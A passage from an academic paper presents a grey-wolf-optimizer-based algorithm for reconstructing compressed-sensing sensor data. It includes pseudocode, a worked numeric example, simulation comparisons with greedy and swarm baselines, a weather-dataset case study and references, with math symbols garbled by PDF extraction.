prey process, a, β and d wolves lead the hunting process. During the hunting process, GWO preserves the first three best solutions (according to their fitness values) for a, β and d, respectively and according to the position of wolves a, β and d, the other search agents (v) estimates their positions. Then, they start to attack the prey. The behavior of this process can be represented mathematically as in Eqs. (9–11) (Faris et al., 2018): Da ¼ C1Xa � Xj j; Db ¼ C2Xb � X �� ; Dd ¼ C3Xd � Xj j (9) X1 ¼ Xa � A1Da; X2 ¼ Xb � A2Db; Xd ¼ Xd � A3Dd (10) X t þ 1ð Þ ¼ X1 þ X2 þ X3 3 (11) After updating the positions of all wolves, the hunting process starts the next iteration to find the new best three solutions and repeat this process until the stopping condition is satisfied. Algorithm 1 presents the GWO technique. GREY WOLF RECONSTRUCTION BASED ALGORITHM In this section, the proposed GWRA is described. GWRA can be used by the base station to reconstruct the sensors readings again. GWRA algorithm is inspired from the GWO algorithm and the reversible GA. GWRA has two forward steps (GA forward and GWO forward) and one backward step. In the first iteration, GWRA starts like any GA by Algorithm 1 GWO Algorithm 1: Initialize the grey wolf population Xi (i = 1, 2, 3, : : : ,n) and t = 1. 2: Initialize C, a, and A using Equations (7) and (8). 3: Calculate the fitness of each search agent. 4: Put the best search agent as Xa, the second best search agent as Xβ and the third best search agent as Xd. 5: while (t < Max number of iterations) 6: for each search agent 7: Modify the current search position using Equation (11). 8: end for 9: Update a, A, and C. 10: Calculate the fitness of all search agents. 11: Modify Xa, Xβ and Xd. 12: t = t + 1. 13: end while 14: return Xa. Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 8/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ initializing the support-set R with q elements using MF detection (GA forward step). GWRA increases the search space (search set C) by selecting extra K elements depending on GWO algorithm (GWO forward step). Then, GWRA solves the LS equation to select the best k elements from q + K elements (backward step). Figure 2 GWRA algorithm flow chart. Full-size DOI: 10.7717/peerj-cs.217/fig-2 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 9/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-2 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ At the end of this iteration, GWRA updates the support-set R with these K elements. From the second iteration, GWRA depends only on GWO forward step to select new k elements and add them to C, i.e., C has 2 � K elements in search space in each iteration to select the best k elements till it reaches the maximum number of iterations. Flow chart of GWRA is shown below in Fig. 2. The difference between GWRA and the other reversible GA like CoSaMP (Needell & Tropp, 2009) and SP (Dai & Milenkovic, 2009) algorithm is that in each iteration, GWRA uses the strength of GWO algorithm to find the best k according to their fitness values that leads the search toward the optimal solution. GWRA consists of two phases: initialization and reconstruction, as described below. Initialization phase Grey wolf reconstruction algorithm performs the following initialization in this phase: [1]. Initialize the support-set R with indices of 4T columns that corresponds to the largest q magnitude components in H, where H = 4Ty. [2]. Initialize the size of q to M/2 - K depending on the fact “CS reconstruction problem can be resolved if the sparsity level K � M/2” [2]. Initializations [1] and [2] will be executed only once at the beginning of the GWRA. [3]. Represent the search agents (wolves) positions as matrix Xi � j, where i = number of wolves and j = K. Each value of this matrix is a randomly selected integer [1, N], where N denotes the count of columns in 4, where each number represents an index of a column in f without duplication. [4]. Initialize Xa, Xβ and Xd as vector 1 � K all of its components equal to 0s. [5]. Initialize best = Secbest = thirbest = infinity. [6]. Initialize outer-loop iteration t = 1. [7]. Initialize the stopping threshold ε = 10-5. [8]. Initialize the estimated solution x′ = ø. Reconstruction phase The details of the reconstruction phase are described as given below: [1]. For each row i in matrix X do the following: a. Create the search set C, where C = R ∪ {Row #i of Xi � j}. b. Create the sub-matrix 4c from the CS matrix f. 4c includes the columns corresponding to the indices in C. c. Create the set I as the K indices in C that have largest amplitude components of 4c †y. d. Create sub-matrix L = fI, the columns of matrix f that corresponds to indices in set I (backward step). e. Calculate the fitness value f(L), GWRA uses the same fitness function in Du, Cheng & Chen (2014) which can be expressed as follows: f Lð Þ ¼ LLyy � yk �� 2 (12) Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 10/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ f. If best > f(L), then best = f(L) and Xa = I. g. Otherwise if best < f(L) and Secbest > f(L), then Secbest = f(L) and Xβ = I. h. Otherwise if best < f(L), Secbest < f(L) and thirbest > f(L), then thirbest = f(L) and Xd = I. i. Set R = I. [2]. Updating wolves position: This step updates each search agent’s position according to Eq. (11). The matrix X is updated according to the new position of Xa, Xβ and Xd. [3]. In order to keep the values of Matrix X as integer values between [1, N], we modified Eq. (11) as follows: X t þ 1ð Þ ¼ Ceil Mod X1þX2þX33 ; N � �� (13) [4]. Check if t (the number of iterations) is less than the maximum count of iterations tmax or best > ε where ε = 10-5, then t = t + 1 and go to [1] else stop and return x′ where x′I = L †y and x′S-I = 0 where S = [1, 2 : : : N]. Algorithm 2 presents the GWRA algorithm. Example scenario For clarification, we illustrate the actions of GWRA using the following example: Input: matrix f6 � 10 (M = 6 and N = 10) with elements generated from uniform distribution, y = fx ∈ R6 is the compressed samples and the sparsity level K = 2. Output: estimated signal x′. f6 � 10 ¼ 0:023 0:275 0:364 0:249 0:150 0:983 0:525 0:9753 0:824 0:075 0:489 0:847 0:207 0:287 0:561 0:412 0:456 0:972 0:360 0:592 0:945 0:804 0:847 0:155 0:271 0:502 0:194 0:306 0:541 0:970 0:967 0:062 0:979 0:609 0:606 0:266 0:214 0:739 0:753 0:573 0:853 0:594 0:374 0:156 0:973 0:260 0:713 0:773 0:850 0:974 0:181 0:483 0:452 0:460 0:357 0:339 0:549 0:538 0:911 0:598 0 BBBBBBBB@ 1 CCCCCCCCA ; y ¼ 0:106 0:560 0:560 0:784 0:973 0:303 2 666666664 3 777777775 ; x ¼ 0:408 0 0 0 0:641 0 0 0 0 0 2 6666666666666666664 3 7777777777777777775 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 11/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Initialization phase execution 1. Support-set R = {10}, the indices of columns of f that correspond to the largest q(= 1) amplitude components in H = 4Ty, where q ¼ M=2 � K ¼ 1. Algorithm 2 GWRA 1: Input: CS matrix fM � N, measurement vector y and sparsity level K. 2: Output: estimated solution set x′: Initialization phase: 3: R ≜ {indices of the q largest magnitude entries in 4Ty}. 4: Initialize the grey wolf population matrix Xi � K with random integers between [1, N]. 5: Xa = zeros (1, K), Xβ = zeros (1, K), Xd = zeros (1, K). 6: best = Secbest = thirbest = ∞. 7: x′ = ø, ε = 10-5 and t = 1. Reconstruction phase: 8: while (t < tmax||best > ε) 9: for each row i of the matrix Xi � K do 10: C = Union(R, Row #i of Xi � j) 11: I ≜ {indices of the K largest magnitude entries in 4c † y}. 12: L = 4I. 13: Calculate the fitness value f(L) using Equation 12. 14. If(best > f(L)), then 15: Xa = I, 16: Else If (best < f(L) && Secbest > f(L)), then 17: Secbest = f(L) and Xβ = I. 18: Else If (best < f(L) && Secbest < f(L) && thirbest > f(L)), then 19: thirbest = f(L) and Xd = I. 20: End If 21: Set R = I. 22: end for 23: Wolf positions updating step: 24: Update a, A, and C 25: for each search agent 26: Update the position of the current search agent by Equation (13). 27: end for 28: t = t + 1 29: End while 30: return x′ where x′I = L †y and x′S-I = L †y where S = [1, 2 : : : N]. Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 12/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ H ¼ 0:023 0:275 0:364 0:249 0:150 0:983 0:525 0:9753 0:824 0:075 0:489 0:847 0:207 0:287 0:561 0:412 0:456 0:972 0:360 0:592 0:945 0:804 0:847 0:155 0:271 0:502 0:194 0:306 0:541 0:970 0:967 0:062 0:979 0:609 0:606 0:266 0:214 0:739 0:753 0:573 0:853 0:594 0:374 0:156 0:973 0:260 0:713 0:773 0:850 0:974 0:181 0:483 0:452 0:460 0:357 0:339 0:549 0:538 0:911 0:598 0 BBBBBBBB@ 1 CCCCCCCCA T 0:106 0:560 0:560 0:784 0:973 0:303 2 666666664 3 777777775 ¼ 2:450 1:729 1:899 1:044 2:014 1:181 1:450 2:316 2:288 2:464 2 6666666666666666664 3 7777777777777777775 2. Matrix Xi � K, where i = number of search agents (= 5) and K = 2, will be initialized as follows: X5 � 2 ¼ 5 7 8 6 9 2 2 4 8 2 0 BBBB@ 1 CCCCA 3. Initialize Xa, Xβ and Xd as Xa = [0 0], Xβ = [0 0] and Xd = [0 0]. best = Secbest = thirbest = ∞. Number of the outer-loop iteration is initialized to t = 1 and the estimated solution x′ = ø. Reconstruction phase execution 1. For each row i in the matrix do: when i = 1 ○ C ¼ R [ frow 1 of X5�2g ¼ f10; 5; 7g; ○ Create the sub-matrix fc by selecting the columns from f which correspond to the indices in C. ϕc ¼ 5; 7; 10f g ¼ 0:150 0:525 0:075 0:561 0:456 0:592 0:271 0:194 0:970 0:606 0:214 0:573 0:973 0:713 0:974 0:357 0:549 0:598 0 BBBBBB@ 1 CCCCCCA Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 13/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ ○ The set I will be created as the indices of the largest K(= 2) amplitude components in fc †y: ϕc ¼ 5; 7; 10f g yy ¼ 0:150 0:525 0:075 0:561 0:456 0:592 0:271 0:194 0:970 0:606 0:214 0:573 0:973 0:713 0:974 0:357 0:549 0:598 0 BBBBBB@ 1 CCCCCCA y 0:106 0:560 0:560 0:784 0:973 0:303 2 6666664 3 7777775 ¼ 0:927 0:300 0:338 2 4 3 5 i.e., I = {5, 10}. And then we create the sub-matrix L ¼ ϕI ¼ 0:150 0:075 0:561 0:592 0:271 0:970 0:606 0:573 0:973 0:974 0:357 0:598 0 BBBBBB@ 1 CCCCCCA ○ Using Eq. (12), the fitness value f(L) of the sub-matrix will be 0.233. ○ Since best > f(L), best = 0.233, Xa = {5, 10}. 2. Repeating the same steps for all rows (i = 2, 3, 4, 5) of X, we will have best = 0.233, Xa = I = {5, 10}. R will be updated as R = I = {5, 10}. 3. Using Eq. (13), the updated position matrix X will be: X5 � 2 ¼ 1 8 6 3 4 8 7 9 7 6 0 BBBB@ 1 CCCCA 4. Since the stop criteria are not satisfied, the iteration number will be updated t = t + 1 and execute Reconstruction phase as follows: For each row i in the matrix do: (when i = 1) ○ C = R ∪ {row 1 in X} = {10, 5, 1, 8}, ○ Create the sub-matrix fc by selecting the columns from matrix f that correspond to indices in C. ϕc ¼ 1; 5; 8; 10f g ¼ 0:023 0:150 0:9753 0:075 0:489 0:561 0:972 0:592 0:945 0:271 0:306 0:970 0:967 0:606 0:739 0:573 0:853 0:973 0:773 0:974 0:181 0:357 0:538 0:598 0 BBBBBB@ 1 CCCCCCA Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 14/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ ○ Create the set I as the indices of the largest K amplitude components in ϕc yy: ϕc yy ¼ 0:023 0:150 0:9753 0:075 0:489 0:561 0:972 0:592 0:945 0:271 0:306 0:970 0:967 0:606 0:739 0:573 0:853 0:973 0:773 0:974 0:181 0:357 0:538 0:598 0 BBBBBB@ 1 CCCCCCA y 0:106 0:560 0:560 0:784 0:973 0:303 2 6666664 3 7777775 ¼ 0:408 0:641 0:2338 0:2254 0:3215 2 66664 3 77775 i.e., I = {1, 5}. ○ The sub-matrix L will be: L ¼ fI ¼ 0:023 0:150 0:489 0:561 0:945 0:271 0:967 0:606 0:853 0:973 0:181 0:357 0 BBBBBB@ 1 CCCCCCA ○ Using Eq. (12), the fitness value f(L) of the sub-matrix L will be 10-16. ○ Since best > f(L), then best = 10-16, Xa = {1, 5}. 5. Repeating the same steps for every row of X (i = 2, 3, 4, 5) in the wolf position matrix X, we will have best = 10-16, Xa = {1, 5}, and updated R = I = {1, 5}. 6. Update each search agent’s position (matrix X) according to Eq. (13): X5 � 2 ¼ 2 7 5 3 4 5 1 9 5 6 0 BBBB@ 1 CCCCA 7. According to the stop criteria best <10-5, stops and calculates x′ as following: x0I¼ 1; 5f g ¼ Lyy ¼ 0:023 0:150 0:489 0:561 0:945 0:271 0:967 0:606 0:853 0:973 0:181 0:357 0 BBBBBBBB@ 1 CCCCCCCCA 0:106 0:560 0:560 0:784 0:973 0:303 2 666666664 3 777777775 ¼ 0:408 0:641 � � and then set x0S�I ¼ 2; 3; 4; 6; 7; 8; 9; 10f g ¼ 0: Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 15/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Then, the estimated signal x′ will be as follows: x0 ¼ 0:408 0 0 0 0:641 0 0 0 0 0 2 666666666666664 3 777777777777775 which is equals to x. Therefore, GWRA succeeds to reconstruct the original data without any errors. SIMULATION RESULTS In this section, the MATLAB environment is used for performing all simulations and the reconstruction is investigated by Gaussian matrix F, of size M � N, where M = 128 and N = 256. Two types of data are used to evaluate the reconstruction performance of the proposed algorithm: computer generated data and real data set. In the first type, we used data generated from Uniform and Gaussian distribution as an example to evaluate the proposed algorithm. The whole process is repeated over 500 times and then averaged on randomly generated K sparse samples. The performance evaluation of GWRA and its comparison with the baseline algorithms such as CoSaMP (Needell & Tropp, 2009), OMP (Tropp & Gilbert, 2007), SP (Dai & Milenkovic, 2009), FBP (Burak & Erdogan, 2013), BA (Bao et al., 2018) and PSO (Du, Cheng & Liu, 2013) in terms of both average normalized mean squared error (ANMSE) and mean absolute percentage error (MAPE) is given below. The setting of used Parameters is shown in Table 3. Performance Metrics: The GWRA algorithm reconstruction’s performance is compared with different reconstruction algorithms in terms of the following performance metrics: 1. Average normalized mean squared error: the average ratio x�x 0 =x2 defines the ANMSE, where x represents the initial reading and x′ represents the reconstructed one. 2. Mean absolute percentage error: the ratio P x�x0 x �� n defines the MAPE. Average normalized mean squared error evaluation The GWRA algorithm is evaluated in terms of ANMSE and the result is compared with the existing algorithms. Figure 3 illustrates the results of ANMSE evaluation in which Gaussian distribution is used to generate the non-zero entries of the sparse signal. The results prove that GWRA algorithm provides reduced ANMSE than CoSaMP, OMP, FBP, BA, PSO and SP. Also, the ANMSE of GWRA starts to increase only when K > 57 while it increased when K > 22, K � 19, K � 26, K � 33, K � 46, K � 38 for CoSaMP, OMP, FBP, SP, BA, PSO, respectively as shown in Fig. 3. This is because GWRA applies the grey wolves’ behavior to hunt the prey (k elements) inside search space (CS matrix) according to their fitness values (the best fitness values). Then, in each iteration, the support-set will be updated with the best k elements, i.e., GWRA has the best-estimated solution till it reaches the optimal one. Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 16/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Figure 4 illustrates the results of ANMSE evaluation in which Uniform distribution is used to generate the non-zero entries of the sparse signal. The results prove that GWRA algorithm still gives the lowest ANMSE value than CoSaMP, FBP, OMP, SP, BA, PSO as K > 53, K � 25, K > 20, K > 26, K > 33, K � 45, K > 37, respectively, because what any GA does in one round, GWRA does it for each search agent and then it selects the best one in every iteration to converge at the optimal solution. In the second test, we measure the reconstruction performance of GWRA as a function in terms of the length of measurement-vector and then compared the results using CoSaMP, FBP, SP, BA, OMP, PSO. The sparse signals are generated using Gaussian distribution having length N = 120, M values varying from 10 to 60 with increment of 1. Illustration of the reconstruction performance of GWRA, CoSaMP, OMP, FBP, SP, BA and PSO with different measurement vector length, M is given in Fig. 5. From the figure, we observe that GWRA algorithm still gives the lowest ANMSE results compared to the others. In the third test, reconstruction performance of GWRA is measured in terms of ANMSE as a function of compression ratio over Uniform and Gaussian sparse vectors as Figure 3 ANMSE in GWRA, CoSaMP, OMP, FBP, SP, BA and PSO algorithms over generated Gaussian sparse vector. Full-size DOI: 10.7717/peerj-cs.217/fig-3 Table 3 Parameters setting. Parameter Value Signal length (N) 256 Measurement vector length (M) 128 CS matrix (F) 128 � 256 Sparse level (K) From 5 to 60 with five increment search agents matrix Xi � j i = 100, j = K Compression ratio 70%, 60%, 50%, 40% and 30% Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 17/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-3 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ shown in Fig. 6 and Table 4, respectively. In this test, we have N = 256 and the different compression ratios are 70%, 60%, 50%, 40% and 30% where K = M/2. Figure 6 shows the ANMSE for GWRA, CoSaMP, OMP, FBP, SP, BA and PSO for different compression ratios. From Fig. 6, we can conclude that GWRA algorithm achieves the best reconstruction performance with different compression ratio. The same performance can be noted from Table 4, where GWRA achieves the minimum reconstruction error in comparison to the other algorithms for different compression ratio values. Figure 5 ANMSE in GWRA, CoSaMP, OMP, FBP, SP, BA and PSO algorithms over generated Gaussian matrix with different lengths of M. Full-size DOI: 10.7717/peerj-cs.217/fig-5 Figure 4 ANMSE in GWRA, CoSaMP, OMP, FBP, SP, BA and PSO algorithms over generated Uniform sparse vector. Full-size DOI: 10.7717/peerj-cs.217/fig-4 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 18/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-5 http://dx.doi.org/10.7717/peerj-cs.217/fig-4 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Table 4 ANMSE for different compression ratios over generated Gaussian sparse vector. Compression ratio (%) GWRA COSAMP OMP FBP SP BA PSO 70 3.10710e-29 5.135 0.228 0.1717 1.699 0.245 0.354 60 0.0583 6.1224 0.828 0.2412 2.164 0.389 0.687 50 0.2515 6.575 1.125 0.2572 2.415 2.124 1.953 40 1.4313 7.025 1.820 2.3341 3.156 3.245 2.644 30 1.894 7.4220 2.348 3.2498 5.125 4.165 4.789 Figure 6 ANMSE in GWRA, CoSaMP, OMP, FBP, SP, BA and PSO algorithms for different compression ratios. Full-size DOI: 10.7717/peerj-cs.217/fig-6 Figure 7 MAPE over sparsity for Uniform sparse vector in GWRA, CoSaMP, OMP, FBP, SP, BA and PSO. Full-size DOI: 10.7717/peerj-cs.217/fig-7 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 19/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-6 http://dx.doi.org/10.7717/peerj-cs.217/fig-7 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Mean absolute percentage error evaluation In the fourth test, we measure the reconstruction performance of GWRA in terms of MAPE and the result is compared with other algorithms. Figure 7 shows MAPE results for GWRA, CoSaMP, OMP, FBP, SP, BA, PSO algorithms and it is clear that GWRA exceeds the reconstruction performance of others in terms of reducing the MAPE, because GWRA integrates the advantages of both greedy as well as the GWO algorithm to achieve the best result. Case study Here, we demonstrate the effectiveness of the GWRA algorithm introduced in this paper in reducing ANMSE and MAPE. For this purpose, the proposed algorithm is applied Figure 8 Weather trace in DCT Domain: (A) the original data and (B) the sparse signal representation. Full-size DOI: 10.7717/peerj-cs.217/fig-8 Figure 9 Weather trace in FFT domain: (A) the original data and (B) the sparse signal representation. Full-size DOI: 10.7717/peerj-cs.217/fig-9 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 20/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-8 http://dx.doi.org/10.7717/peerj-cs.217/fig-9 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ to reconstruct real weather dataset (Ali, Gao & Mileo, 2018). This dataset contains weather observations of Aarhus city, Denmark obtained during February–June 2014 and also August–September 2014. In this test, we use the weather dataset of February 2014 period as original data. Using CS, February dataset is compressed, then we apply, evaluate and compare the performance of GWRA, CoSaMP, OMP, FBP, LP (Pant, Lu & Antoniou, 2014) and SP to recover it back. In addition, we use DCT (Duarte-Carvajalino & Sapiro, 2009) and FFT (Canli, Gupta & Khokhar, 2006) as sparse domain, as shown in Figs. 8 and 9. Figure 10 shows the ANMSE of GWRA, CoSaMP, OMP, FBP, LP and SP using DCT domain. It is clear that GWRA achieves the great performance in reducing ANMSE than other algorithms in case of using DCT as a signal transformer. Figure 11 shows that using FFT domain as signal transformer, the ANMSE of all algorithms increases, but still GWRA provides the best performance. Figure 10 ANMSE in GWRA, SP, FBP, LP, OMP and CoSaMP algorithms using DCT domain (case study). Full-size DOI: 10.7717/peerj-cs.217/fig-10 Figure 11 ANMSE in GWRA, SP, FBP, LP, OMP and CoSaMP algorithms using FFT domain (case study). Full-size DOI: 10.7717/peerj-cs.217/fig-11 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 21/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-10 http://dx.doi.org/10.7717/peerj-cs.217/fig-11 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ As a last test in case study, the performance of GWRA, SP, FBP, LP, OMP and CoSaMP are evaluated in terms of MAPE. It shows that GWRA still succeeds to be superior in the reconstruction performance than the others in terms of reducing MAPE as shown in Fig. 12. Complexity analysis Figure 13 shows the complexity in the GWRA, OMP, CoSaMP and SP algorithms. It is clear that as swarm algorithm, the complexity of the proposed algorithm is higher than the GA but it is more efficient in data reconstruction. However, the high complexity in GWRA does not represent a problem, since the algorithms will be executed at the BS which has enough hardware capability and not energy constraint. Figure 12 MAPE in GWRA, SP, FBP, LP, OMP and CoSaMP algorithms for weather trace (case study). Full-size DOI: 10.7717/peerj-cs.217/fig-12 5 10 15 20 25 Sparsity Level 6 6.5 7 7.5 8 8.5 9 9.5 A v e ra g e R u n T im e ( S e c ) × 10-3 SP OMP COSaMP GWRA Figure 13 Complexity comparison GWRA, OMP, CoSaMP and SP algorithms. Full-size DOI: 10.7717/peerj-cs.217/fig-13 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 22/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-12 http://dx.doi.org/10.7717/peerj-cs.217/fig-13 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Image reconstruction test In this test, we aim to evaluate the reconstruction performance of the GWRA, where it is used to reconstruct 512 � 512 campanile image, which is a typical sight on the Berkeley campus (https://github.com/dfridovi/compressed_sensing) (Fridovich-Keil & Kuo, 2019), as shown in Fig. 14. It can be noted that GWRA efficiently succeeds to reconstruct the test image with small error which proves the efficiency of GWRA. CONCLUSION In this paper, a novel reconstruction approach for CS signal, based on GWO has been presented which integrates between GA and GWO algorithms to utilize their advantages in fast implementation and finding optimal solutions. In the provided experiments, GWRA exhibited better reconstruction performance for Gaussian and Uniform sparse signals. GWRA achieved overwhelming success over the traditional GA algorithms CoSaMP, OMP, FBP and SP. Also, GWRA provided better reconstruction performance than other swarm algorithms BA and PSO. GWRA successfully reconstructed datasets of weather observations as a case study and it is shown that GWRA succeeded to recover the data correctly with lesser ANMSE and MAPE than compared with existing algorithms. The demonstrated performance prove that GWRA is a promising technique that provides significant reduction in reconstruction errors. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Ahmed Aziz conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or Figure 14 GWRA based image reconstruction test: (A) original image and (B) the reconstructed image. Full-size DOI: 10.7717/peerj-cs.217/fig-14 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 23/25 https://github.com/dfridovi/compressed_sensing http://dx.doi.org/10.7717/peerj-cs.217/fig-14 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Karan Singh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Ahmed Elsawy conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Walid Osamy conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Ahmed M. Khedr conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: MATLAB code is available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.217#supplemental-information. RFERENCES Ali MI, Gao F, Mileo A. 2018. CityBench: a configurable benchmark to evaluate RSP engines using smart city datasets. In: The Semantic Web - ISWC 2015 - 14th International Semantic Web Conference, October 11–15, 2015, Bethlehem, PA, USA. Bao W, Liu H, Huang D, Hua Q, Hua G. 2018. A bat-inspired sparse recovery algorithm for compressed sensing. Computational Intelligence and Neuroscience 2018:1365747 DOI 10.1155/2018/1365747. Burak N, Erdogan H. 2013. Compressed sensing signal recovery via forward–backward pursuit. Digital Signal Processing 23(5):1539–1548 DOI 10.1016/j.dsp.2013.05.007. Candes E, Tao T. 2006. Robust uncertainty principles: exact signal reconstruction from highly incomplete frequency information. IEEE Transactions on Information Theory 52(2):489–509 DOI 10.1109/tit.2005.862083. Canli T, Gupta A, Khokhar A. 2006. Power efficient algorithms for computing fast fourier transform over wireless sensor networks. In: IEEE International Conference on Computer Systems and Applications, 2006. Piscataway: IEEE, 549–556. Cevher V, Jafarpour S. 2010. Fast hard thresholding with nesters gradient method. In: Workshop on Practical Applications of Sparse Modeling. Available at https://infoscience.epfl.ch/record/ 155219/files/nips2010_1.pdf. Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 24/25 http://dx.doi.org/10.7717/peerj-cs.217#supplemental-information http://dx.doi.org/10.7717/peerj-cs.217#supplemental-information http://dx.doi.org/10.7717/peerj-cs.217#supplemental-information http://dx.doi.org/10.1155/2018/1365747 http://dx.doi.org/10.1016/j.dsp.2013.05.007 http://dx.doi.org/10.1109/tit.2005.862083 https://infoscience.epfl.ch/record/155219/files/nips2010_1.pdf https://infoscience.epfl.ch/record/155219/files/nips2010_1.pdf http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Chartrand R, Yin W. 2008. Iteratively reweighted algorithms for compressive sensing. In: IEEE International Conference on Acoustics, Speech and Signal Processing. Piscataway: IEEE, 3869–3872. Choi K, Wang J, Zhu L, Suh TS, Boyd S, Xing L. 2010. Compressed sensing based cone-beam computed tomography reconstruction with a first-order method. Medical Physics 37(9):5113–5125 DOI 10.1118/1.3481510. Dai W, Milenkovic O. 2009. Subspace pursuit for compressive sensing signal reconstruction. IEEE Transactions on Information Theory 55(5):2230–2249 DOI 10.1109/tit.2009.2016006. Davenport MA, Boufounos PT, Wakin MB, Baraniuk RG. 2010. Signal processing with compressive measurements. IEEE Journal of Selected Topics in Signal Processing 4(2):445–460 DOI 10.1109/jstsp.2009.2039178. Donoho D. 2006. Compressed sensing. IEEE Transactions on Information Theory 52(4):1289–1306. Donoho DL, Tsaig Y, Drori I, Starck JL. 2012. Sparse solution of underdetermined systems of linear equations by stagewise orthogonal matching pursuit. IEEE Transactions on Information Theory 58(2):1094–1121 DOI 10.1109/tit.2011.2173241. Du X, Cheng L, Chen D. 2014. A simulated annealing algorithm for sparse recovery by l0 minimization. Neurocomputing 131:98–104 DOI 10.1016/j.neucom.2013.10.036. Du XP, Cheng LZ, Liu LF. 2013. A swarm intelligence algorithm for joint sparse recovery. IEEE Signal Processing Letters 20(6):611–614 DOI 10.1109/lsp.2013.2260822. Duarte-Carvajalino JM, Sapiro G. 2009. Learning to sense sparse signals: simultaneous sensing matrix and sparsifying dictionary optimization. IEEE Transactions on Image Processing 18(7):1395–1408 DOI 10.1109/tip.2009.2022459. Faris H, Aljarah I, Azmi Al-Betar M, Mirjalili S. 2018. Grey wolf optimizer: a review of recent variants and applications. Neural Computing and Applications 30(2):413–435 DOI 10.1007/s00521-017-3272-5. Fridovich-Keil D, Kuo G. 2019. Image compression using compressed sensing. Available at https://github.com/dfridovi/compressed_sensing. Mallat S, Wavelet A. 1999. Tour of signal processing. New York: Academic Press. Mallat SG, Zhang Z. 1993. Matching pursuits with time-frequency dictionaries. IEEE Transactions on Signal Processing 41(12):3397–3415 DOI 10.1109/78.258082. Mirjalili S, Mohammad Mirjalili S, Lewis A. 2014. Grey wolf optimizer. Advances in Engineering Software 69:46–61. Needell D, Tropp JA. 2009. CoSaMP: iterative signal recovery from incomplete and inaccurate samples. Applied and Computational Harmonic Analysis 26(3):301–321 DOI 10.1016/j.acha.2008.07.002. Needell D, Vershynin R. 2009. Uniform uncertainty principle and signal recovery via regularized orthogonal matching pursuit. Foundations of Computational Mathematics 9(3):317–334 DOI 10.1007/s10208-008-9031-3. Pant JK, Lu W, Antoniou A. 2014. New improved algorithms for compressive sensing based on Lp norm. IEEE Transactions on Circuits and Systems II: Express Briefs 61(3):198–202. Tropp JA, Gilbert AC. 2007. Signal recovery from random measurements via orthogonal matching pursuit. IEEE Transactions on Information Theory 53(12):4655–4666 DOI 10.1109/tit.2007.909108. Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 25/25 http://dx.doi.org/10.1118/1.3481510 http://dx.doi.org/10.1109/tit.2009.2016006 http://dx.doi.org/10.1109/jstsp.2009.2039178 http://dx.doi.org/10.1109/tit.2011.2173241 http://dx.doi.org/10.1016/j.neucom.2013.10.036 http://dx.doi.org/10.1109/lsp.2013.2260822 http://dx.doi.org/10.1109/tip.2009.2022459 http://dx.doi.org/10.1007/s00521-017-3272-5 https://github.com/dfridovi/compressed_sensing 